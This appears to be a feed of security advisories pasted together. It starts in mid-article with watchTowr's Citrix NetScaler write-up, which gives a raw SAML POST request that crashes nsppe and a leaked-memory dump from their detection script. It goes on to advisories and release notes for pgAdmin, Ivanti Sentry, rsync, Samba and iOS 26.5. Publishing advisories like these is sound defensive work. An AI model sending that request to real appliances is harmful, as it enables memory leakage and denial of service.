&lt;samlp:AuthnRequest ID=

POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 46

SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D

This request causes the nsppe process to "crash out":

Detection Artefact Generator

As always, we’re here to share our Detection Artefact Generator to determine your own susceptibility and inform remediation in your own environments. It can be found on our GitHub here.

c:\&gt;python watchTowr-vs-Netscaler-CVE-2026-8451.py &lt;https://all-ur-boxen.com&gt;
..
Leaked bytes:
00000000  f0 0d 90 de de de de de de de de de de de de de   |................|
00000010  de de de de de de de de de de de de de de de de   |................|
00000020  de de de de de de de de de de de de de de de de   |................|
00000030  de de de de de de de de de de de de de de de de   |................|
00000040  de de de de de de de de de de de de de de ed a7   |................|
00000050  0c a1 35 00                                       |..5.|
..

Thanks, PolyMarket

We get to eat tonight!

Timeline

  • Date: 28th March 2026
  • Detail: watchTowr discovers issue, notifies Citrix and affected clients
  • Date: 28th March 2026
  • Detail: Citrix responds with what appears to be an automatic reply
  • Date: 30th April 2026
  • Detail: watchTowr requests update from Citrix
  • Date: 7th May 2026
  • Detail: watchTowr again requests update from Citrix
  • Date: 7th May 2026
  • Detail: Citrix advises that a fix is being developed
  • Date: 14 June 2026
  • Detail: Citrix advise they expect to publish on 29th June
  • Date: 25th June 2026
  • Detail: Citrix advises that a fix may be delayed by ‘a few days’; watchTowr responds that this is acceptable
  • Date: 30th June 2026
  • Detail: Citrix publish advisory and patches
  • Date: 30th June 2026
  • Detail: watchTowr publishes research, and memes

The research published by watchTowr Labs is powered by the same engine behind the watchTowr Platform, our Preemptive Exposure Management solution built for enterprises that refuse to wait for the next satisfying advisory from their scanner vendor.

The watchTowr Platform combines External Attack Surface Management and Continuous Automated Red Teaming to test your defenses against the vulnerabilities and techniques that matter: the ones real attackers are actually exploiting.

Gain early access to our research, and understand your exposure, with the watchTowr Platform

REQUEST A DEMO


Related vulnerabilities: CVE-2025-12101CVE-2026-3055CVE-2025-12101CVE-2026-0050CVE-2026-3055CVE-2025-5777CVE-2026-8451CVE-2025-5777

WARNING: Remote Code Execution and Cross-Site Scripting in pgAdmin 4 Can Be Exploited to Execute Arbitrary Commands and Exfiltrate Database Credentials. Patch Immediately! | CCB Belgium

Reference: https://ccb.belgium.be/advisories/warning-remote-code-execution-and-cross-site-scripting-pgadmin-4-can-be-exploited

Published : 22/06/2026

> * Last update: 22/06/2026 > * Affected software: pgAdmin 4 prior to version 9.16 > * Type:
> → CWE-306: Missing Authentication for Critical Function / CWE-502: Deserialization of Untrusted Data
> → CWE-285: Improper Authorization
> → CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-Site Scripting') > * CVE/CVSS
> → CVE-2026-12048: CVSS 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)
> → CVE-2026-12046: CVSS 9.0 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
> → CVE-2026-12045: CVSS 9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

Sources

pgAdmin - https://www.pgadmin.org/docs/pgadmin4/9.16/release_notes_9_16.html

Risks

pgAdmin 4 is the leading open-source graphical administration and management tool for PostgreSQL databases, widely used by database administrators in both server and desktop deployments.

If exploited, these vulnerabilities could allow attackers to execute arbitrary commands on the underlying server, gain unauthorized access to the database management interface without valid credentials, or inject malicious scripts that steal saved database credentials and issue SQL queries against every connected server. Successful exploitation may result in unauthorized access to sensitive database information (Confidentiality), unauthorized modification or deletion of database content (Integrity), or disruption of database management services (Availability).

Description

CVE-2026-12048 is a stored cross-site scripting vulnerability where PostgreSQL server error text and Explain plan-node content were passed unsanitized through html-react-parser across multiple UI components, including notifier toasts, form errors, modal alerts, and the Explain visualiser. Because pgAdmin's default Content-Security-Policy allows inline scripts, injected JavaScript runs same-origin to the victim's authenticated session and can read every saved server connection credential and issue arbitrary SQL against every server the victim is connected to.

CVE-2026-12046 affects two SQL Editor endpoints (close and update_connection) that were missing the authentication decorator (@pga_login_required) in server mode. This made the endpoints reachable by unauthenticated attackers and exposed a pickle deserialization sink, enabling remote code execution without prior authentication.

CVE-2026-12045 affects the AI Assistant feature. A read-only transaction bypass allowed prompt-injected multi-statement payloads to commit write operations outside the READ ONLY transaction wrapper. On superuser database connections, this flaw chains to remote code execution via the “COPY ... TO PROGRAM” PostgreSQL command.

Recommended Actions

Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing.

Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity and ensure a swift response in case of an intrusion.

In case of an intrusion, you can report an incident via https://ccb.belgium.be/en/cert/report-incident.

While patching appliances or software to the newest version may protect against future exploitation, it does not remediate historic compromise.

References

NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-12048
NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-12045
NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-12046


Related vulnerabilities: CVE-2026-12046CVE-2026-12045CVE-2026-12048

CVE Number Description CVSS Score (Severity) CVSS Vector CWE
CVE-2026-10520 An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution 10 (Critical) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CWE-78
CVE-2026-10523 An Authentication Bypass vulnerability (CWE-288) in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access 9.9(Critical) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CWE-288

Ref: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US


Related vulnerabilities: CVE-2026-10520CVE-2026-10523

NEWS for rsync 3.4.3 (20 May 2026) Changes in this version: SECURITY FIXES:

Six CVEs are fixed in this release. All six are assigned by VulnCheck as CNA. Affected versions are 3.4.2 and earlier in every case. Three of the six (CVE-2026-29518, CVE-2026-43617, CVE-2026-43619) require non-default daemon configuration to reach: the first and third need use chroot = no for a module, the second needs daemon chroot = ... set in rsyncd.conf. Two (CVE-2026-43618, CVE-2026-43620) are reachable from a normal pull or a normal authenticated daemon connection. The sixth (CVE-2026-45232) is reachable only when RSYNC_PROXY is set and the proxy (or a MITM) returns a pathological response. Many thanks to the external researchers who reported these issues.

CVE-2026-29518 (CVSS v4.0 7.3, HIGH): TOCTOU symlink race condition allowing local privilege escalation in daemon mode without chroot. An rsync daemon configured with "use chroot = no" was exposed to a time-of-check / time-of-use race on parent path components: a local attacker with write access to a module could replace a parent directory component with a symlink between the receiver's check and its open(), redirecting reads (basis-file disclosure) and writes (file overwrite) outside the module. Default "use chroot = yes" is not exposed. secure_relative_open() (added in 3.4.0 for CVE-2024-12086) was previously unused in the daemon-no-chroot case; the fix enables it there and reroutes the sender's read-path opens through it. Reported by Nullx3D (Batuhan Sancak), Damien Neil and Michael Stapelberg.

CVE-2026-43617 (CVSS v3.1 4.8, MEDIUM): Hostname/ACL bypass on an rsync daemon configured with daemon chroot = /X in rsyncd.conf when the chroot tree lacks DNS resolution support. The reverse-DNS lookup of the connecting client was performed after the daemon chroot had been entered; if /X did not contain the libc resolver fixtures (/etc/resolv.conf, /etc/nsswitch.conf, /etc/hosts, NSS service modules) the lookup failed and the connecting hostname was set to "UNKNOWN", causing hostname-based deny rules to silently fail open. IP-based ACLs are unaffected. The per-module use chroot setting is unrelated to this issue. The fix performs the lookup before entering the daemon chroot. Reported by MegaManSec.

CVE-2026-43618 (CVSS v3.1 8.1, HIGH): Integer overflow in the compressed-token decoder enabling remote memory disclosure to an authenticated daemon peer. The receiver accumulated a 32-bit signed counter without overflow checking; a malicious sender could trigger an overflow that, with careful manipulation, leaked process memory contents to the attacker -⁠-⁠ environment variables, passwords, heap and library pointers -⁠-⁠ significantly weakening ASLR. The fix bounds the counter and adds wire-input validation in several adjacent places (defence-in-depth). Workaround for older releases: refuse options = compress in rsyncd.conf. Reported by Omar Elsayed.

CVE-2026-43619 (CVSS v3.1 6.3, MEDIUM): Symlink races on path-based system calls in "use chroot = no" daemon mode (generalisation of CVE-2026-29518). Earlier fixes for symlink races on the receiver's open() call missed the same race class on every other path-based system call: chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir and lstat. The fix routes each affected path-based syscall through a parent dirfd opened under RESOLVE_BENEATH-equivalent kernel-enforced confinement (openat2 on Linux 5.6+, O_RESOLVE_BENEATH on FreeBSD 13+ and macOS 15+, per-component O_NOFOLLOW walk elsewhere). Default "use chroot = yes" is not exposed. Reported by Andrew Tridgell as a follow-on audit of CVE-2026-29518.

CVE-2026-43620 (CVSS v3.1 6.5, MEDIUM): Out-of-bounds read in the receiver's recv_files() enabling remote denial-of-service of any client pulling from a malicious server (incomplete fix of commit 797e17f). The earlier parent_ndx&lt;0 guard added to send_files() was not applied to the visually-identical block in recv_files(). A malicious rsync server can drive any connecting client into a deterministic SIGSEGV by setting CF_INC_RECURSE in the compatibility flags and sending a crafted file list and transfer record. inc_recurse is the protocol-30+ default, so no special options are required on the victim. Workaround for older releases: --no-inc-recursive on the client. Reported by Pratham Gupta.

CVE-2026-45232 (CVSS v3.1 3.1, LOW): Off-by-one out-of-bounds stack write in the rsync client's HTTP CONNECT proxy handler (establish_proxy_connection() in socket.c). After issuing the CONNECT request, rsync read the proxy's first response line one byte at a time into a 1024-byte stack buffer with the bound cp &lt; &amp;buffer[sizeof buffer - 1]. If the proxy (or a MITM in front of it) returned 1023+ bytes on that first line without a newline terminator, cp exited the loop pointing at a buffer slot the loop never wrote, leaving *cp holding stale stack data from the earlier snprintf() of the outgoing CONNECT request. The post-loop logic then wrote a single \0 one byte past the end of the buffer on the stack. Reach is client-side only, and only when RSYNC_PROXY is set so rsync tunnels an rsync:// connection through an HTTP CONNECT proxy. The written byte is always \0 and the offset is fixed by the buffer size, not attacker-chosen, so this is not an arbitrary-write primitive: practical impact is corruption of one adjacent stack byte and possible later misbehaviour or crash. The fix detects the "buffer filled without finding \n" case explicitly by position and refuses the response with "proxy response line too long". Reported by Aisle Research via Michal Ruprich (rsync-3.4.1-2.el10 QE).

In addition to the six CVE fixes, this release adds defence-in-depth hardening on several adjacent paths: bounded wire-supplied counts and lengths in flist/io/acls/xattrs, a guard against length underflow in cumulative snprintf() callers, a parent block-index bounds check on the receiver, a NULL check in read_delay_line(), a lower ceiling on MAX_WIRE_DEL_STAT to avoid signed-int overflow in the read_del_stats() accumulator, rejection of hyphen-prefixed remote-shell hostnames (defence-in-depth against argv-injection in tooling that forwards untrusted input into the hostspec position; reported by Aisle Research via Michal Ruprich), and a NULL-check on localtime_r() in timestring() to keep a malicious server from crashing the client by advertising a file with an out-of-range modtime. BUG FIXES:

Fixed a regression introduced by the 3.4.0 secure_relative_open() CVE fix where legitimate directory symlinks on the receiver side (e.g. when using -K / --copy-dirlinks) caused "failed verification -⁠-⁠ update discarded" errors on delta transfers. The old code rejected every symlink in the path with a per-component O_NOFOLLOW walk; the receiver now uses kernel-enforced "stay below dirfd" path resolution where available. Fixes #715.

PORTABILITY / BUILD:

secure_relative_open() now uses openat2(RESOLVE_BENEATH | RESOLVE_NO_MAGICLINKS) on Linux 5.6+, and openat() with O_RESOLVE_BENEATH on FreeBSD 13+ and macOS 15+ (Sequoia) / iOS 18+. The kernel rejects ".." escapes, absolute symlinks, and symlinks whose target lies outside the starting directory, while still following symlinks that resolve within it -⁠-⁠ the same trade-off that fixes the issue #715 regression without weakening the original CVE protection. Other platforms (Solaris, OpenBSD, NetBSD, Cygwin) retain the previous per-component O_NOFOLLOW walk; on those platforms the issue #715 regression remains visible.

testsuite/xattrs: ignore SUNWattr_* in the Solaris xls helper.

DEVELOPER RELATED:

Added testsuite/symlink-dirlink-basis.test (taken from PR #864 by Samuel Henrique) covering the issue #715 regression and several edge cases (--backup, --inplace, --partial-dir with protocol &lt; 29, top-level files). The test skips on platforms without a RESOLVE_BENEATH equivalent.

Added regression tests for the new security fixes: chmod-symlink-race.test, chdir-symlink-race.test, bare-do-open-symlink-race.test, alt-dest-symlink-race.test, copy-dest-source-symlink.test, sender-flist-symlink-leak.test, secure-relpath-validation.test, daemon-chroot-acl.test and daemon-refuse-compress.test. The symlink-race tests skip on Cygwin, Solaris, OpenBSD and NetBSD (no RESOLVE_BENEATH equivalent on those platforms).

runtests.py now errors early with a clear message when any of the test helper programs (tls, trimslash, t_unsafe, t_chmod_secure, t_secure_relpath, wildtest, getgroups, getfsdev) are missing, instead of letting many tests fail with confusing "not found" errors.

Added OpenBSD and NetBSD CI jobs that run make check on those platforms.

Added Ubuntu 22.04 and AlmaLinux 8 CI workflows so future backports to the two mainstream LTS families build and test on the same CI surface as trunk.

testsuite/protected-regular.test now runs unprivileged via unshare with user-namespace UID mapping, falling back to skip if unshare/uidmap is not available; previously it required real root.

Added symlink-dirlink-basis to the Cygwin CI's expected-skipped list.

Removed the old release system (replaced by the new release script in 3.4.2).


Related vulnerabilities: CVE-2026-43620CVE-2026-29518CVE-2024-12086CVE-2026-43618CVE-2026-45232CVE-2026-43617CVE-2026-43619

=========================================================== == Subject: Unauthenticated Remote Code Execution == in Samba printing subsystem == == CVE ID#: CVE-2026-4480 == == Versions: All versions == == Summary: Samba print servers with a "print command" == that has the %J substitution character == are vulnerable to a Remote Code Execution ===========================================================

=========== Description ===========

Samba passes the client-controlled job description string to the command configured with the "print command" setting via the "%J" substitution character without escaping shell meta characters. This leads to a remote code execution vulnerability.

Print servers configured with "printing = cups" or "printing = iprint", and print servers that do not have the %J substitution character in the "print command" setting are not affected.

The problem is much less dangerous if %J has singles quotes directly around it, e.g. '%J', but it's still possible to inject command line options.

By default, print servers allow guest users to print.

================== Patch Availability ==================

Patches addressing this issue have been posted to:

https://www.samba.org/samba/security/

Additionally, Samba $VERSIONS have been issued as security releases to correct the defect. Samba administrators are advised to upgrade to these releases or apply the patch as soon as possible.

================== CVSSv3 calculation ==================

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 10.0

========== Workaround ==========

Adding single quotes (directly!) around %J (=> '%J') makes it much less likely an attacker can do something useful. Note using double quotes may not be enough.

If unsure remove %J completely from the "print command" smb.conf entry.

======= Credits =======

Originally reported by: - Ron Ben Yizhak with SafeBreach - John Walker with ZeroPath - Arjun Basnet with Securin Labs

Patches provided by: - Stefan Metzmacher of Sernet and the Samba team. - Douglas Bagnall of Catalyst and the Samba team.

This advisory by Volker Lendecke and Stefan Metzmacher of Sernet and the Samba team.

========================================================== == Our Code, Our Bugs, Our Responsibility. == The Samba Team ==========================================================


Related vulnerabilities: CVE-2026-4480

Package : samba CVE ID : CVE-2026-1933 CVE-2026-2340 CVE-2026-3012 CVE-2026-3238 CVE-2026-4408 CVE-2026-4480

Several vulnerabilities have been discovered in Samba, a SMB/CIFS file, print, and login server for Unix, which might result in bypass of access checks, overwrite of files in unintended situations using the WORM vfs module, installing CA certificates over http without verification when auto-enrollment GPO is enabled, denial of service or remote code execution.

For the oldstable distribution (bookworm), these problems have been fixed in version 2:4.17.12+dfsg-0+deb12u4.

For the stable distribution (trixie), these problems have been fixed in version 2:4.22.8+dfsg-0+deb13u2.

We recommend that you upgrade your samba packages.

For the detailed security status of samba please refer to its security tracker page at: https://security-tracker.debian.org/tracker/samba

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org


Related vulnerabilities: CVE-2026-1933CVE-2026-2340CVE-2026-4480CVE-2026-4408CVE-2026-3238CVE-2026-3012

About the security content of iOS 26.5 and iPadOS 26.5 - Apple Support

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

Released May 11, 2026

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause a denial-of-service

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-28991: Seiji Sakurai (@HeapSmasher)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass certain Privacy preferences

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28988: Asaf Cohen

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28959: Dave G.

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A malicious app may be able to break out of its sandbox

Description: A logic issue was addressed with improved restrictions.

CVE-2026-28995: Vamshi Paili, Tony Gorez (@tonygo_) for Reverse Society

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may lead to a denial-of-service

Description: This is a vulnerability in open source code and Apple Software is among the affected projects. The CVE-ID was assigned by a third party. Learn more about the issue and CVE-ID at cve.org.

CVE-2026-1837

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory

Description: A memory corruption issue was addressed with improved input validation.

CVE-2026-28956: impost0r (ret2plt)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing an audio stream in a maliciously crafted media file may terminate the process

Description: The issue was addressed with improved memory handling.

CVE-2026-39869: David Ige of Beryllium Security

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2026-28964: Alan Wang, Christopher W. Fletcher, Hovav Shacham, David Kohlbrenner, Riccardo Paccagnella

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved checks.

CVE-2026-28936: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2026-28918: Niels Hofmans, Anonymous working with TrendAI Zero Day Initiative

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-43659: Alex Radocea

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may corrupt process memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2026-43661: an anonymous researcher

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved bounds checks.

CVE-2026-28977: Suresh Sundaram

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28990: Jiri Ha, Arni Hardarson

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker may be able to cause unexpected app termination

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2026-28992: Johnny Franks (@zeroxjf)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to determine kernel memory layout

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28943: Google Threat Analysis Group

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28969: Mihalis Haatainen, Ari Hawking, Ashish Kunwar

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-43655: Somair Ansar and an anonymous researcher

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2026-43654: Vaagn Vardanian, Nathaniel Oh (@calysteon)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: A buffer overflow was addressed with improved input validation.

CVE-2026-28897: popku1337, Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Robert Tran, Aswin kumar Gokulakannan

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2026-28951: Csaba Fitzl (@theevilbit) of Iru

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-28972: Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Ryan Hileman via Xint Code (xint.io)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination

Description: A race condition was addressed with additional validation.

CVE-2026-28986: Chris Betz, Tristan Madani (@TristanInSec) from Talence Security, Ryan Hileman via Xint Code (xint.io)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to leak sensitive kernel state

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28987: Dhiyanesh Selvaraj (@redroot97)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause a denial of service

Description: A type confusion issue was addressed with improved checks.

CVE-2026-28983: Ruslan Dautov

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2026-43653: Atul R V

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: A null pointer dereference was addressed with improved input validation.

CVE-2026-28985: Omar Cerrito

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A use after free issue was addressed with improved memory management.

CVE-2026-43668: Anton Pakhunov, Ricardo Prado

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2026-43666: Ian van der Wurff (ian.nl)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28940: Michael DePlante (@izobashi) of TrendAI Zero Day Initiative

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker may be able to track users through their IP address

Description: This issue was addressed through improved state management.

CVE-2026-28906: Ilya Sc. Jowell A.

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-43656: Peter Malone

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected app termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28846: Peter Malone

Available for: iPhone 15 and later

Impact: An attacker with physical access may be able to use Visual Intelligence to access sensitive user data during iPhone Mirroring

Description: A privacy issue was addressed by removing the vulnerable code.

CVE-2026-28963: Jorge Welch

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by adding an additional prompt for user consent.

CVE-2026-28993: Doron Assness

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause a denial-of-service

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2026-28974: Andy Koo (@andykoo) of Hexens

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to capture a user's screen

Description: An issue with app access to camera metadata was addressed with improved logic.

CVE-2026-28957: Adriatik Raci

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-28996: Alex Radocea

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A validation issue was addressed with improved logic.

WebKit Bugzilla: 308906

CVE-2026-43660: Cantina

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 308675

CVE-2026-28907: Cantina

